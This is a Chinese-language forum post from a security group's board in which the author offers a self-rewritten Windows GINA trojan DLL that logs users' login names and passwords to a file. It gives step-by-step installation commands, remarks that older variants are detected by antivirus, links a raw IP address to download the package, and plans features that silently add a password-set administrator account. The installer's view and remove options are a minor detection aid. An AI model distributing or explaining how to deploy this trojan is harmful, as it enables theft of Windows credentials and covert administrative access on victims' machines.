|
作者: wineggdrop [wineggdrop] 论坛用户 | 登录 |
Gina木马的主要作用是在系统用户登陆时,将用户登陆的名字,登陆密码等记录到文件中去,因为这个 DLL是在登陆时加载,所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户 密码等的情况存在。 网络上有很多这类的Gina木马存在,写程序的原理都是一样的,常见的有fakegina,win 2k密码大盗 和ntshell等,因为那些都一般被查杀了,而且在我看来还是算大的,所以重写了一个Gina木马(基本 代码都是在msdn中很久前发布过的,所以我不敢说这是我自己写的程序,所以亦不会有什么banner 的出现,除了安装这个木马的程序,那是我自己写的,无论是fakegina,win 2k密码大盗等,那些 程序使用的那个dll都是从msdn中那个发布了的ginadll源程序改进过来的). 压缩包中有三个程序,一个是Gina.Dll(那个DLL木马),一个是InstGina.exe,这个是安装DLL木马的。 InstGina.exe有三种用法: 1.InstGina -view 这是查看系统中GinaDLL那键值是否有被安装过DLL,主要用来查看系统是否被人安装了Gina木马或 使用其它DLL作为登陆所用 2.InstGina -Remove 这是将系统中GinaDLL那键值删除,主要是发现如果系统被人装了Gina木马的话,用于删除 3.InstGina -Install GinaDLL文件名 这是安装上Gina木马。 安装方法: 1.将InstGina.exe和Gina.DLL复制到同一个目录下,不需要一定复制到system32下的,因为InstGina 如果发现当前目录不是系统目录的话,会将Gina.Dll复制过去的了。 2.执行InstGina.exe -install Gina.dll 如果你将Gina.Dll改名字了,例如改为abc.dll,那么你要执行的命令是Instgina.exe -install abc.dll 3.看到"Set Gina Trojan Successfully"的字眼证明成功了,如果返回信息是"The Key GinaDLL Does Exist",这证明GinaDLL这值已被设置了,你可以用-remove将那键删除了,然后再安装。 记录保存到WinEggDrop.dat中去 有可能加入的其它功能 1.用户登陆时自动将一个自定义的帐户加到admin组并设置密码(不会超过30行代码) 2.定时将一个用户加入admin组并设置密码(上面的功能+定时检查时间) 211.93.112.71/Gina.zip |
地主 发表时间: 02/23 08:09 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号